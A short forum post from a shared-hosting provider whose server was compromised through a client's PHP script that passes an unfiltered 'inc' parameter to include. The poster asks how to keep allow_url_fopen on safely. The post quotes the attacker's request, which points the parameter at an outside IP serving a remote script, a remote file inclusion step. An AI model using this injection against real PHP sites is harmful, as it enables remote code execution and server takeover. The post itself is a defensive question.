fopen and urls in PHP - Security Issue

I provide a shared hosting environment and have had a client write an insecure script using the "include" statement. The server got hacked (more details below) and I eventually changed the "allow_url_fopen" php.ini setting to "Off" to disable the source of the attacks.

My question is: Does anyone know how I can allow_url_fopen to be "On" and still protect against poor programming?

More specifics on hack...
The user was including local files in his url (had to use hddp to post this)
hddp://domain.com/index.php?inc=some_file.php and the vandal simply typed in
hddp://domain.com/index.php?inc=201.XXX.XXX.XXX/destructive_script.exe ...
Without filtering the incoming variable $inc, the vandal successfully installed a root kit and ... well you know the rest.

 

 

 

 

Top